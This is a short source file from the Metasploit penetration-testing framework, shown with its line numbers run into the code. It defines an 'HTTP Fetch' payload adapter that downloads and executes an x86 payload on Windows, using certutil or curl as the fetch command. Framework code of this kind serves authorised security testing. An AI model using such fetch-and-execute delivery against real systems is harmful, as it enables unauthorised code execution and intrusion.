Path: blob/master/modules/payloads/adapters/cmd/windows/http/x86.rb
57489 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6include Msf::Payload::Adapter::Fetch::HTTP7include Msf::Payload::Adapter::Fetch::WindowsOptions89def initialize(info = {})10super(11update_info(12info,13'Name' => 'HTTP Fetch',14'Description' => 'Fetch and execute an x86 payload from an HTTP server.',15'Author' => 'Brendan Watters',16'Platform' => 'win',17'Arch' => ARCH_CMD,18'License' => MSF_LICENSE,19'AdaptedArch' => ARCH_X86,20'AdaptedPlatform' => 'win'21)22)23deregister_options('FETCH_COMMAND')24register_options(25[26Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CERTUTIL', %w[CURL CERTUTIL]])27]28)29end30end313233